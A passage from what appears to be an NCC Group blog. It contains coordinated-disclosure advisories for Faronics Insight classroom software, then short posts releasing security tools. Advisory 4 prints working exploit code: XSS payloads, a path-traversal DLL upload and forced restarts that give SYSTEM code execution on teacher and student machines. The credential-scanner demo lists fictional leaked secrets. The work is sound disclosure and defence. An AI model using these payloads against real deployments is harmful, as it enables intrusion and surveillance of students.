It was observed as part of this vulnerability research that a network connected attacker with knowledge of a student’s agent ID, which is trivial to obtain by abusing Faronics UDP broadcast discovery mechanism, is able to send arbitrary files to this API endpoint and deploy them anywhere on the teacher’s disk.

At this point there are clearly numerous different ways that this could be abused to obtain privileged code execution, ranging from deploying the file to an administrator’s “Startup” directory to overwriting any number of files under C:\Windows\System32 to achieve persistence as SYSTEM.

NCC Group researchers instead chose to chain three vulnerabilities in Faronics Insight together to achieve a more immediate RCE as SYSTEM –

  1. Upload a malicious copy of “sas.dll” to “C:\Program Files\Faronics\Insight Student” using the API
  2. Leverage the “Fake Student Console” zero click XSS vulnerability to call “<script>relaunchInsight();</script>”, restarting the Teacher Console process
  3. Leverage the DLL hijacking vulnerability such that when Insight relaunches, it attempts to load the malicious “sas.dll” DLL file and executes the malicious code within as SYSTEM.

The following screenshot demonstrates the result of this exploit chain, that a new administrator named OLIVER_BROOKS_NCC2 was created –

Recommendation

NCC Group recommends that additional access controls are implemented which restrict an unauthorized/unauthenticated attacker from submitting files to the API. These access controls could be implemented by requiring valid Student Consoles to submit a valid session ID cookie with every HTTP request.

NCC Group recommends that the Teacher Console is updated to restrict file uploads to a particular directory, this will help to ensure that in the event of a Student Console compromise, an attacker is unable to persist files in arbitrary locations on the Teacher’s file system.

Finally, NCC Group recommends that some consideration is given to the principal of least privilege. If the “FITeacherServer.exe” could successfully function when executed by a lower privileged user then it would be safer to do so, this would greatly lower the severity of any code execution vulnerabilities which emerge in the future.

4. RCE as SYSTEM via Artificial Student Console and XSS (CVE-2023-28347)

Risk: Critical (9.6 CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

Summary

It is possible for an attacker to create a proof of concept script which functions similarly to a Student Console, providing unauthenticated attackers with the ability to exploit XSS vulnerabilities within the Teacher Console application and gain RCE in a ‘Zero Click’ manner.

Impact

Due to the rich and highly privileged functionality offered by the Teacher Console, the ability to silently exploit XSS on the Teacher Machine enables remote code execution on any connected student machine (and the teacher’s machine).

Details

NCC Group researchers observed that, in the default installation configuration, the Teacher Console application contains no authentication or authorization logic when allowing Student Consoles to connect. Because of this, it is possible for an attacker to create their own “Student Console” like application which is purpose-built to exploit flaws in the Teacher Console and connected Student Consoles.

As noted in the Technical Advisory named “RCE as SYSTEM via Artificial Teacher Console”, after going through the UDP handshake process, Student Consoles automatically open a WebSocket connection with the Teacher Console and begin receiving instructions.

NCC Group researchers also observed that when a malicious (artificial) Student Console is created, it is possible to exploit a Cross Site Scripting vulnerability in the “loggedInUser” field of the initial “updateSTAgentStatus” call. The Teacher Console simply renders whatever “loggedInUser” field is provided straight into the DOM and any JavaScript in that field is immediately executed without any user interaction.

As such, a small proof of concept exploit was developed which performs the following steps –

  • Abuses the UDP broadcast API to get all active student IDs
  • Abuses the UDP broadcast API to get the teacher’s IP and ID
  • Uploads a malicious DLL file to the teacher’s machine using the “/api/uploadFiles” endpoint
  • Creates a WebSocket connection to the Teacher Console
  • For every active student, it submits a malicious “updateSTAgentStatus” HTTP request to the teacher which contains the following XSS payload –
# Start compromising all students.
for student in studentIDs:
    # Inspiration for this exploit from teacher.js line 12213
    # Send the DLL to the students
    json={
        "macAddresses":"00:00:00:00:00:00",
        "ipAddresses":"999.999.999.999",
        "loggedInUser":"<script>sendActionOnSocket({type: 1,handlerFuncName : \"updateAgent\",data: {fileName:\"../../../../Program Files/Faronics/Insight Student/sas.dll\", downloadFilePath:\"/installers/sas.dll\"}, targets: [\""+student+"\"]});</script>",
        "os":"windows",
        "hostName":"DESKTOP-irrelevant",
        "limiting":{"web":0,"apps":0,"print":0,"drives":0,"lockScreen":0,"muteSpeaker":0,"lockKbdM":0},
        "lastKnownState":{"assessmentMode":0,"handRaised":0,"monitorIndex":0},
        "monitorCount":1,
        "screenSharingAllowed":True,
        "isUserLoggedIn":True,
        "canChangePreferredName":True,
        "hasMic":True,
        "version":"11.21.2100.262",
        "agentId":desiredMachineID.decode("ascii"),
        "classId":"Class101","preferredName":""
    }

    requests.post(f"http://{teacherIP}:8890/api/updateSTAgentStatus/{desiredMachineID.decode('ascii')}", json=json)

Observe that within the “loggedInUser” field is a JavaScript payload which compels a Student Console to execute the “updateAgent” command by retrieving the malicious “sas.dll” file and deploying it to the Faronics Insight installation directory. The proof of concept then abuses the XSS vulnerability again to force all connected Student Consoles to restart using the “restartInsightAgent” command –

time.sleep(3)

    # Instruct the students to restart insight, causing the DLL to be loaded and execute, creating a new user (OLIVER_BROOKS_NCC2:FaNcYfEaSt%2)
    json={
        "macAddresses":"00:00:00:00:00:00",
        "ipAddresses":"999.999.999.999",
        "loggedInUser":"<script>sendActionOnSocket({type: 1,handlerFuncName : \"restartInsightAgent\",targets: [\""+student+"\"]});</script>",
        "os":"windows",
        "hostName":"DESKTOP-irrelevant",
        "limiting":{"web":0,"apps":0,"print":0,"drives":0,"lockScreen":0,"muteSpeaker":0,"lockKbdM":0},
        "lastKnownState":{"assessmentMode":0,"handRaised":0,"monitorIndex":0},
        "monitorCount":1,
        "screenSharingAllowed":True,
        "isUserLoggedIn":True,
        "canChangePreferredName":True,
        "hasMic":True,
        "version":"11.21.2100.262",
        "agentId":desiredMachineID.decode("ascii"),
        "classId":"Class101","preferredName":""
    }

    requests.post(f"http://{teacherIP}:8890/api/updateSTAgentStatus/{desiredMachineID.decode('ascii')}", json=json)

At this point, code execution as SYSTEM has been achieved on every connected student’s machine.

Finally, the script uploads the same malicious DLL file to the teacher’s Faronics Insight installation directory and compels the Teacher Console to restart by abusing the XSS vulnerability –

# All students are compromised at this point, now we get RCE on the teacher too using the same trick
# Step 4: Send the DLL again and put it in the Insight Teacher directory to get RCE on the teacher
sharedCode.sendFileToTeacher(teacherIP, desiredMachineID.decode("ascii"), localPath, "C:\\Program Files\\Faronics\\Insight Teacher\\", True)

# Quick sleep to make sure everything's planted correctly.
time.sleep(3)

# Step 5: Use XSS to trigger a restart on the teacher machine using the relaunchInsight(); Javascript function
json={
    "macAddresses":"00:00:00:00:00:00",
    "ipAddresses":"999.999.999.999",
    "loggedInUser":"<script>relaunchInsight();</script>",
    "os":"windows",
    "hostName":"DESKTOP-irrelevant",
    "limiting":{"web":0,"apps":0,"print":0,"drives":0,"lockScreen":0,"muteSpeaker":0,"lockKbdM":0},
    "lastKnownState":{"assessmentMode":0,"handRaised":0,"monitorIndex":0},
    "monitorCount":1,
    "screenSharingAllowed":True,
    "isUserLoggedIn":True,
    "canChangePreferredName":True,
    "hasMic":True,
    "version":"11.21.2100.262",
    "agentId":desiredMachineID.decode("ascii"),
    "classId":"Class101","preferredName":""
}

requests.post(f"http://{teacherIP}:8890/api/updateSTAgentStatus/{desiredMachineID.decode('ascii')}", json=json)

# Step 6: cleanup and be stealthy
# Not yet implemented

sio.disconnect()

At this point, RCE has been achieved on the teacher’s machine and every connected student’s machine by abusing a zero-click XSS vulnerability.

It should be noted, however, that the artificial Student Console could be amended to abuse the XSS vulnerability in any number of ways, including scraping all active Student Console’s file systems and overwriting critical system files to achieve a persistent Denial of Service.

Recommendation

As noted in the other provided Technical Advisories in this bundle, NCC Group strongly recommends that the Teacher Console is updated to require authentication from any Student Console, including requiring a valid session cookie or JWT with every HTTP request from a Student Console.

Requiring authentication with every request will help to mitigate this vulnerability, because it will remove an attacker’s ability to create and operate artificial Student Consoles.

5. RCE as SYSTEM via Artificial Teacher Console (CVE-2023-28349)

Risk: Critical (9.6 CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

Summary

It is possible for an attacker to create an exploit which functions similarly to the Teacher Console, which compels Student Consoles to connect and exploit themselves automatically.

Impact

Remote attackers are able to gain covert remote code execution and surveillance capabilities on student machines by masquerading as a valid Teacher Console.

Details

As part of this vulnerability research, researchers spent some time analysing how Student Consoles and Teacher Consoles connect to one another in the default configuration. The following steps were observed before any connection is made.

  1. The Student Console Windows service (FIStudentSvc.exe) starts, which starts the Student Agent (FIStudentAgent.exe) as SYSTEM
  2. The Teacher Console Windows service (FITeacherSvc.exe) is started, which starts the Teacher Server (FITeacherServer.exe) as SYSTEM
  3. The Teacher Server begins making periodic “DISCO” (discovery) UDP broadcasts to 255.255.255.255 on port 8889 indicating that the teacher console is available
  4. All active Student Agent applications respond directly to those broadcasts with a UDP RESP (response) packet. The RESP packet contains their “agent ID”, a unique UUID-like identifier for that Student.
  5. The Teacher then sends a UDP START packet to the student, which compels them to automatically perform the following four steps –
    • Make a HTTP request to the Teacher Console at “/api/getClassSettings” to obtain some basic settings about the class
    • Make a HTTP request to “/api/updateSTAgentStatus” to provide the Teacher with some basic details about the Student Console
    • Make a HTTP request to the Teacher at the “/socket.io/” endpoint to start a Websocket session where the Teacher Console Command and Control is performed
    • Make repeated HTTP requests to the API endpoints at “/api/uploadscreenshots” and “/api/appKeystrokeLogs” which provide the Teacher Console with an image of the student’s desktop and a running record of every key that the student types.

At no point during the above sequence of operations is any kind of cryptographic handshake performed to ensure the validity of a Teacher Console, the Student Console is simply compelled to connect and begin divulging keylogger data and screenshots simply by virtue of being provided the UDP “START” packet.

Once the WebSocket connection is setup, a Teacher Console can begin sending commands to the student desktop like “downloadFile”, “launchApp” and “restartInsight”. Having the ability to compel a Student Console to execute these commands paves the way for arbitrary file write and RCE as SYSTEM.

NCC Group researchers created a proof of concept which sends the DISCO UDP broadcast, sends a START packet to any student which responds and then spins up a websocket / HTTP server to handle all requests from the connecting Student Console. The proof of concept then deploys “sas.dll” to the Faronics Student installation directory, commands the application to restart with the “restartInsight” WebSocket command and achieves RCE as SYSTEM using the DLL hijacking vulnerability described in the DLL Hijacking technical advisory.

Recommendation

NCC Group strongly recommends that the initial UDP broadcast challenge/response system is amended to include some form of cryptographic handshake, using a either a pre-shared key which is set at application install time for both the Teacher Console and Student Consoles or alternatively both Student and Teacher consoles could reach out to a Faronics cloud API to obtain a keypair which could be used for authentication. If the Student Console was able to verify that they are connecting to a legitimate Teacher Console by decrypting a “challenge” in the DISCO packet and sending an encrypted “response” in the RESP packet then this vulnerability would be immediately mitigated.

6. All Data Transmitted in Plaintext Enabling MITM (CVE-2023-28348)

Risk: High (7.1 CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N)

Summary

Data transmitted between Student Consoles and Teacher Consoles is sent over plaintext HTTP and plaintext WebSockets.

Impact

A suitably positioned attacker could perform a person-in-the-middle attack on either a connected student or teacher and intercept student keystrokes or modify executable files being sent from teachers to students.

Details

The Faronics Insight application allows teachers (running the Teacher Console) to administer student devices (running the Student Console). The Teacher Console compels Student Consoles to perform various activities by sending commands over WebSockets, the Student Console responds to these commands either directly over the WebSocket or using the HTTP API exposed by the Teacher Console on port 8890.

Because neither the webserver nor the WebSocket server utilize TLS, it is possible for an attacker to perform a classic ‘person-in-the-middle’ attack to intercept, monitor and manipulate communications between teachers and students.

Recommendation

NCC Group recommends that Faronics ensures that all API traffic and WebSocket traffic is sent over HTTPS and TLS enabled WebSockets. Socket.IO (the WebSocket library used by this application suite) supports TLS out of the box according to the documentation.

7. Enhanced Security Mode May Be Bypassed (CVE-2023-28352)

Risk: High (8.8 CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Summary

Each of the vulnerabilities identified within this bundle of Technical Advisories all execute successfully even when Enhanced Security Mode is enabled.

Impact

An attacker controlled artificial Student Console can connect to and attack a Teacher Console even after Enhanced Security Mode has been enabled.

Details

The Faronics Insight Teacher and Student Consoles expose a function at either install time or at runtime called “Enhanced Security”. This functionality is intended to prevent arbitrary Student Consoles from being able to connect to a class, as well as to prevent arbitrary Teacher Consoles from presenting themselves and compelling Student Consoles to join them.

The Enhanced Security functionality forms an effective security measure against unmodified and legitimate Consoles. If a Student Console and Teacher Console do not have the same Enhanced Security key, a student will not be able to join a teacher, and a teacher will not be able to compel a student to join.

It can be seen here within Wireshark that when Enhanced Security mode is enabled on both Consoles, two Consoles will be unable to discover each other with UDP broadcasts if they have differing keys –

It appears that this functionality works by setting an encoded or encrypted section in the UDP broadcasts, which the other party is able/unable to decrypt if their keys match/don’t match respectively.

As part of this vulnerability research, NCC Group researchers observed that if UDP DISCO / RESP / START broadcast packets were simply transmitted without the encoded payload by an artificial Teacher or Student Console then both students and teachers would respond to them, allowing the malicious Console to complete the handshake successfully and either compel Student Consoles to connect or to successfully connect to a Teacher Console as appropriate.

Because of this, each of the supplied Technical Advisories are valid and each of the developed proof-of-concept scripts execute successfully even when Enhanced Security mode is enabled.

Recommendation

NCC Group recommends that the Enhanced Security mechanisms are updated in both the Teacher and Student Consoles such that if a UDP broadcast is received which doesn’t contain the encoded portion then it is simply ignored. This will act as an effective mitigation against malicious Teacher Consoles compelling Student Consoles to connect.

NCC Group also recommends that the Teacher Console is updated to validate that connections are being made from a Student Console which also has both Enhanced Security enabled, and has the correct Enhanced Security key set. This could be validated as part of a HTTP header containing an encrypted and encoded payload, for example.

8. Virtual Host Routing Can Be Defeated (CVE-2023-28346)


Risk: Low (2.8 CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N)

Summary

It is possible for a remote attacker to communicate with the private API endpoints exposed on “/login”, “/consoleSettings”, “/console” etc. despite Virtual Host Routing being used to block this access.

Impact

Remote attackers can interact with private pages on the webserver, enabling them to perform privileged actions such as logging into the console and changing console settings if they have valid credentials.

Details

The Faronics Insight Teacher Console exposes a HTTP server on port 8890. The server offers a set of public API endpoints under “/api/*’ which don’t require any authentication. These endpoints are used by Student Consoles to transmit data back and forth from the Teacher Console.

The webserver on port 8890 also exposes another set of endpoints such as “/login”, “/consoleSettings”, “/console” which are only accessible if the user attempts to access them using, for example, http://127.0.0.1:8890 or http://localhost:8890. Attempts to communicate with the webserver remotely are blocked with a 404 error.

During this vulnerability research, it was identified that it’s possible to supply a HTTP “Host” header with a value of “localhost:8890” in order to defeat this control and access the console remotely. Defeating the Virtual Host Routing control enables any network connected attacker to begin auditing and attacking the product as if they were situated on localhost.

Recommendation

NCC Group anticipates that Faronics developers are likely using a library such as VHost as Virtual Host Routing middleware for Express. In addition to using such a middleware, NCC Group suggests that each of the private (localhost only) API endpoints implement a check to ensure that the IP address of the HTTP requestor is either “localhost” or “127.0.0.1”.

An alternative solution which requires more extensive architectural changes would be to setup a second webserver which hosts the private API endpoints, configured to only listen for HTTP traffic from localhost.

9. Keystroke Logs Are Stored in Plaintext in a World Readable Directory (CVE-2023-28351)

Risk: Medium (6.5 CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N)

Summary

Every keystroke made by any user on a computer with Faronics Insight Student installed is logged to a world readable directory.

Impact

An attacker with physical or local access to a computer with Faronics Insight installed can trivially extract the plaintext keystrokes of any student who has used the machine, potentially enabling them to obtain PII and/or to compromise personal accounts owned by the victim.

Details

The Faronics Insight Student Console application silently logs every keystroke made by a user, these keystroke logs are periodically transmitted as a JSON payload over a HTTP WebSocket to the Teacher Console where they are made available for the teacher to view them.

During this vulnerability research, it was observed that the keystroke logs are stored in “C:\ProgramData\Faronics\Insight\Data\KeyLogs”, a world readable folder where every individual plaintext keystroke log is readable by any user on the Student Console machine.

It’s unclear how long these log files remain present in this directory before they are purged, but their presence on the machine constitutes a threat to the privacy of the user’s whose keys are being logged by Faronics Insight.

Recommendation

NCC Group recommends that all keystroke logging activity is performed in memory as opposed to storing files on disk, so that after keystrokes are transmitted to the Teacher Console there is no trace of the keystroke logs remaining on disk. Alternatively, if the logs must be kept on disk for a short amount of time, then the “C:\ProgramData\Faronics\Insight\Data\KeyLogs” directory must have its permissions restricted such that only an administrator or SYSTEM can access them, additionally the files should be encrypted at rest in order to help to protect the student’s privacy.

10. Lack of Access Controls on Student APIs (CVE-2023-28344)

Risk: Medium (6.5 CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

Summary

The Insight Teacher Console application allows unauthenticated attackers to view constantly updated screenshots of student desktops and to submit falsified screenshots on behalf of students.

Impact

Attackers are able to view screenshots of student desktops without their consent. These screenshots may potentially contain sensitive/personal data. Attackers can also rapidly submit falsified images, hiding the actual contents of student desktops from the Teacher Console.

Details

Student Consoles submit screenshots over HTTP POST to the Teacher Console’s webserver on the API endpoint at “/api/uploadscreenshot/agent_id”, where agent_id is the unique UUID-like string which uniquely identifies a connected student’s Console.

By default, Student Consoles will silently transmit a screenshot of the student’s desktop to the teacher every few seconds. The Teacher Console then retrieves these screenshots via HTTP GET from “/uploads/screenshots/agent_id.jpeg” and renders them in the Console. The API endpoint at “/uploads/screenshots/agent_id.jpeg” requires no authentication or authorization to view the uploaded images, because of this, a network connected attacker is able to obtain the images simply by navigating to the correct URL for a given agent ID.

Exposing these images to anyone on the network may potentially inadvertently leak a student’s Personally Identifiable Information (PII) to anyone who is able to guess or otherwise determine the student’s agent ID.

Additionally, because Student Consoles submit their screenshots reasonably quickly and because the Teacher API has no rate limiting measures in place, it is possible for an attacker to query the API rapidly and repeatedly in order to obtain a low framerate “video” feed of the student’s device.

In addition to a lack of access controls on the screenshot-retrieval API, there is also no access control present on the API endpoint which allows students to submit screenshots to the server (“/api/uploadscreenshot/agent_id”).

Lack of access controls on this API endpoint allows any network connected user to send images to the Teacher Console on behalf of a victim Student Console. When the Teacher Console receives these images it then immediately renders them instead of the targeted student’s actual desktop.

In addition to the above two access control lapses, there is also no access control present on the API endpoint which enables Student Consoles to upload the keystrokes that they’ve logged from users. Lack of access control on this API endpoint enables an attacker to submit arbitrary keystrokes to the API on behalf of a student, allowing them to decrease the quality of the logged keystrokes.

Recommendation

NCC Group recommends that the API is updated to only return student device screenshots when HTTP requests originate from localhost, this way the screenshots will not be available to users who attempt to interact with the API remotely.

Additionally, NCC Group recommends that access controls are implemented to prevent arbitrary users from submitting screenshots on behalf of students. Finally, as a general recommendation for the entire application, NCC Group recommends that the Teacher Console is updated to require that a unique session ID be provided with every HTTP request from Student Consoles. A unique session ID, combined with TLS, will help to ensure that requests from student consoles are legitimate.

11. Teacher Console Credentials Exposed via API Endpoint (CVE-2023-28345)

Risk: Medium (4.0 CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

Summary

The Insight Teacher Console application exposes the teacher’s Console password in plaintext via an API endpoint accessible from localhost.

Impact

Attackers with physical access to the Teacher Console can open a web browser, navigate to the affected endpoint and obtain the teacher’s password. This enables them to log into the Teacher Console and begin trivially attacking student machines.

Details

The Faronics Insight Teacher Console exposes a HTTP server on port 8890. One of the API endpoints available only when making requests to the API from localhost is “/consoleSettings”, this API endpoint returns basic configuration details about the Teacher Console –

Included within this response is the teacher’s password in plaintext (along with the license key and console versions). Exposing this data in plaintext via the API enables an attacker with physical access to retrieve the teacher’s credentials and log in to the Teacher Console.

Because the Teacher Console enables teachers to remotely control student machines via a pseudo-VNC, access to the Teacher Console enables an attacker to trivially compromise any connected student machine.

Because of the flaws highlighted in the Technical Advisory named “Virtual Host Routing Can Be Defeated”, any network connected attacker can connect to this API endpoint and obtain these credentials.

Recommendation

NCC Group recommends against exposing credentials and license keys via API endpoints. As such, the “consoleSettings” API endpoint should be reconfigured to return a minimal set of configuration data to remove this attack vector.

If there is an unavoidable requirement to expose the credentials via this API endpoint, NCC Group strongly recommends that the data is first encrypted and then encoded with base64. This will require a small modification to enable API consumers to decrypt that data, but it will slightly minimize the risk of compromise.

Disclosure Timeline

  • 02/01/2023 – First contact with vendor to setup a secure channel to share the vulnerabilities
  • 02/01/2023 – Technical Advisories submitted to Faronics
  • 02/23/2023 – Contact re-established with Faronics to check how the fixes were progressing
  • 03/03/2023 – Re-established contact to set a firm disclosure date of April 28th
  • 03/14/2023 – CVE numbers assigned and shared with Faronics
  • 04/28/2023 – Contact made with Faronics to query the status of the fixes
  • 05/01/2023 – Faronics indicated that the disclosure date would be missed, a QA build would be coming soon
  • 05/03/2023 – A QA build of Faronics Insight was given to NCC Group to validate the fixes
  • 05/04/2023 – The QA build was confirmed to have mitigated all of the identified vulnerabilities
  • 05/17/2023 – Reached out to Faronics once again to enquire about their readiness to release the patch
  • 5/17/2023 – Faronics publishes v11.23.x.289 containing fixes (release notes)

Thanks To

I would like to praise the Faronics team on their professionalism, responsiveness and the commitment to the security of their product.

I would also like to thank Jeremy Boone, an NCC Group Technical Director, for his QA efforts and for always patiently answering any silly question which I pose to him.

Finally I’d like to thank my colleague Julian Yates for his QA efforts, and for being an excellent sounding board during this vulnerability research.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Tool Release: Code Query (cq)

26 May 2023 at 15:14

Code Query is a new, open source universal code security scanning tool.

CQ scans code for security vulnerabilities and other items of interest to security-focussed code reviewers. It outputs text files containing references to issues found, into an output directory. These output files can then be reviewed, filtered by unix command line tools such as grep, or used as a means to ‘jump’ into the codebase at the specified file:line reference.

One popular mode of use is to consider the output files as a ‘todo’ list, deleting references as they are reviewed and either considered false positives, or copying the references into some report file to either review in detail or provide the basis for a bug report.

The tool is extremely basic, largely manual, and assumes deep knowledge of application security vulnerabilities and code review. It does, however, have the advantages of being relatively fast and reliable, and working even when only partial code is available.

CQ is intended to be used in a security code review context by human experts. It is not intended for use in automated scenarios, although it might be applied in that context.

The CQ project is located at: https://github.com/nccgroup/cq

CowCloud

25 May 2023 at 17:28

A common challenge technical teams (e.g. penetration testers) face is centralized deployment and pipelining execution of security tools. It is possible that at some point you have thought about customising several tools, buying their commercial licenses, and allowing a number of people to run the tools from AWS.

The problem is that this means you also have to deal with a bunch of tedious tasks like giving your team access to the EC2 instances, managing the IAM users, updating the OS to protect against privilege escalation, protecting tool licenses, powering the EC2 instances on and off as required.

Let’s imagine that we want to define a pipeline that we want to execute it continuously (e.g. a CI/CD pipeline). When given a range of IP addresses, it scans the UDP ports with Nmap, launches Nessus PRO to analyse the available ports for vulnerabilities and also runs ScoutSuite to evaluate an AWS account. Let’s further imagine that we want all this traffic to originate from a specific pool of AWS IP addresses, that the pipeline tools should be executed in a distributed manner and, while we’re at it, offer the user a web interface so as to abstract them from all the infrastructure that runs underneath.

CowCloud is a serverless solution to distribute workloads in AWS that can execute these pipelines. To get started, spin up an EC2 instance, access it, install Nmap, Nessus and register your Nessus pro license. Then download the ec2py/template.py file from the CowCloud repository and customise it to run both tools against one target and saves the output in the temporal folder `tmp_folder`.

Once you confirm that the template.py works, create a snapshot of the EC2 instance and save the AMI ID of the snapshot.

Next, clone the repository locally, open the Terraform/variables.tf file, and update the AMI variable with your AMI ID, and then simply follow the rest of the installation steps in the repository’s Readme.md.

At the end of the CowCloud deployment, access the URL shown in the Terraform output, log into the website, and queue a new task. Subsequently, the tasks will be consumed by the ec2py tool, which runs on an EC2 instance using your AMI as the base image. And the output/result/reports will be compressed, encrypted and uploaded to an S3 bucket so that the user can download the result of the Nmap and Nessus scans.

That’s all there is to it!

This solution is ideal for cases where you want to maintain an AMI with up-to-date commercial and open source tools and custom configurations for your pentests. With CowCloud, you can abstract users from the hurdles of maintaining and managing the infrastructure so that they only have to worry about the target. All they have to do is send a small amount of required information to the tools that run on the EC2 instances.

CowCloud can be used for a whole range of purposes – you may already have thought of some use cases yourself – but some of the more common ones are detailed below:

  • Baselining security testing. Use CowCloud to launch a series of tools that you consider as a baseline every time you do an external pentest (or participate in a bug bounty) and from a pool of EIPs from which the client expects to receive attacks
  • Centralized Tool Access and Management. Add API keys and commercial licenses to your AMI so you can provide your teams with the best and most relevant capability, while responsibly managing your licenses.
  • Distributed password cracking in AWS. Update the `instance_type` in the variables.tf file with one suitable for cracking passwords

Check out the CowCloud tool here: https://github.com/nccgroup/cowcloud

Tool Release: Code Credential Scanner (ccs)

23 May 2023 at 11:00

Code Credential Scanner is a new open source tool designed to detect hardcoded credentials, or credentials present in configuration files within a repository. These represent a serious security issue, and can be extremely hard to detect and manage.

The tool is intended to be used directly by dev teams in a CI/CD pipeline, to manage the remediation process for this issue by alerting the team when credentials are present in the code, so that the team can immediately fix issues as they arise; an example github action is provided to illustrate how this can be configured. Since the tool runs on a local filesystem, it can also be run ad-hoc to detect credentials in local files.

The script is written in python and requires no external dependencies. When run without parameters, it attempts to return only the most serious results, and reduce the number of false-positives (at the inevitable cost of false-negatives). Alternatively, it can be run in a more verbose mode to return usernames, email addresses and similar, in addition to passwords and keys.

CCS is available for download from https://github.com/nccgroup/ccs

The text below is a quick example of ccs running in its default mode on the deliberately-vulnerable repository, “leaky-repo”, at https://github.com/Plazmaz/leaky-repo. All credentials are fictional and provided for demonstration purposes.

[email protected] demo % ~/dev/ccs/ccs.py 
/private/tmp/demo/leaky-repo/.ftpconfig:6:PASSWORD:Rule:49:"pass": ":hunter22:",
/private/tmp/demo/leaky-repo/.ftpconfig:12:PASSWORD:Rule:50:"passphrase": ":swordfish:",
/private/tmp/demo/leaky-repo/.netrc:1:PASSWORD:Rule:51:machine imap.gmail.com login [email protected] password :pass123:
/private/tmp/demo/leaky-repo/.bashrc:105:PASSWORD:Rule:17:export GMAIL_PASSWORD=":Pass!12345:"
/private/tmp/demo/leaky-repo/.bashrc:106:PASSWORD:Rule:27:export MAILCHIMP_API_KEY=":38c47f19e349153fa963bb3b3212fe8e-us11:"
/private/tmp/demo/leaky-repo/.bashrc:109:PASSWORD:Rule:45:JEKYLL_GITHUB_TOKEN=":c77e01c1e89682e4d4b94a059a7fd2b37ab326ed:"
/private/tmp/demo/leaky-repo/sftp-config.json:15:PASSWORD:Rule:19:    "password": ":hunter22:",
/private/tmp/demo/leaky-repo/deployment-config.json:5:PASSWORD:Rule:19:    "password": ":hunter22:",
/private/tmp/demo/leaky-repo/.npmrc:7:PASSWORD:Rule:52:_auth = :YWRtaW46YWRtaW4=:
/private/tmp/demo/leaky-repo/.remote-sync.json:17:PASSWORD:Rule:19:    "password": ":hunter22:"
/private/tmp/demo/leaky-repo/.bash_profile:12:PASSWORD:Rule:28:export AWS_SECRET_ACCESS_KEY=:nAH2VzKrMrRjySLlt8HCdFU3tM2TUuUZgh39NX:
/private/tmp/demo/leaky-repo/.bash_profile:22:PASSWORD:Rule:45:HOMEBREW_GITHUB_API_TOKEN=':51e61afee2c2667123fc9ed160a0a20b330c8f74:'
/private/tmp/demo/leaky-repo/.bash_profile:23:PASSWORD:Rule:2:export SLACK_API_TOKEN=':xoxp-858723095049-581481478633-908968721956-f16b85d1f73ef37c02323bf3fd537ea5:'
/private/tmp/demo/leaky-repo/proftpdpasswd:1:PASSWORD:Rule:67:root::$6$LnUhhUi45srUKt9i$4Hp6VRTOB2mxvsYH8mwsCfBryg6hCbm4JJjV26KplN8ewZ7EUVqQDkLKDW.O8XRHx.B76JkwXtyD3wnAXEuZN1:3044:3045::/home/root:/bin/ftpsh:
/private/tmp/demo/leaky-repo/.docker/.dockercfg:4:PASSWORD:Rule:47:"auth": ":X3Rva2VuOjEyMzQuMThqZjg0MWZrbDQwYU90dTNrLXdCbDVuaThDM2Q0QVh0QjM2V2VqZzM4MDA2WlR5TDhUOWg5VXgrWWwzdTNVQ1hDWFZlWg:"
/private/tmp/demo/leaky-repo/.docker/.dockercfg:8:PASSWORD:Rule:47:"auth": ":X3Rva2VuOjEyMzQuMThqZjg0MWZrbDQwYU90dTNrLXdCbDVuaThDM2Q0QVh0QjM2V2VqZzM4MDA2WlR5TDhUOWg5VXgrWWwzdTNVQ1hDWFZlWg:"
/private/tmp/demo/leaky-repo/.docker/config.json:5:PASSWORD:Rule:47:"auth": ":X3Rva2VuOjEyMzQuMThqZjg0MWZrbDQwYU90dTNrLXdCbDVuaThDM2Q0QVh0QjM2V2VqZzM4MDA2WlR5TDhUOWg5VXgrWWwzdTNVQ1hDWFZlWg:"
/private/tmp/demo/leaky-repo/.docker/config.json:9:PASSWORD:Rule:47:"auth": ":X3Rva2VuOjEyMzQuMThqZjg0MWZrbDQwYU90dTNrLXdCbDVuaThDM2Q0QVh0QjM2V2VqZzM4MDA2WlR5TDhUOWg5VXgrWWwzdTNVQ1hDWFZlWg:"
/private/tmp/demo/leaky-repo/.mozilla/firefox/logins.json:12:PASSWORD:Rule:62:"encryptedPassword": ":MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECBQ0N0EftdcPBBD9CaBvRSe9MhhqBjbd3UG8:",
/private/tmp/demo/leaky-repo/.mozilla/firefox/logins.json:28:PASSWORD:Rule:62:"encryptedPassword": ":MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECBUufYeWbuziBBAraNDREdVus+piXPZaR/Ym:",
/private/tmp/demo/leaky-repo/.mozilla/firefox/logins.json:44:PASSWORD:Rule:62:"encryptedPassword": ":MFIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECNa3fxQUbhzwBCjyWS8Qx2UiUcoq3nvLmPXWtc4bdm88HLfIMTGJcM7WvDALDHdWIAwY:",
/private/tmp/demo/leaky-repo/.mozilla/firefox/logins.json:60:PASSWORD:Rule:62:"encryptedPassword": ":MFoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECCSrh9ud0IorBDA4ncCjHIDjDlUIliEvJ7at4r2M68qLKFHTGEsiUkRJjRJ0ir6Zy59rKq4EtVnrzMI=:",
/private/tmp/demo/leaky-repo/web/var/www/.env:5:PASSWORD:Rule:56:APP_KEY=:base64:4StV8PVvCLC6gkJXgGdkYdlWW0suqjb2sj0QvDHx3Hsn:
/private/tmp/demo/leaky-repo/web/var/www/.env:14:PASSWORD:Rule:57:DB_PASSWORD=:admin123:
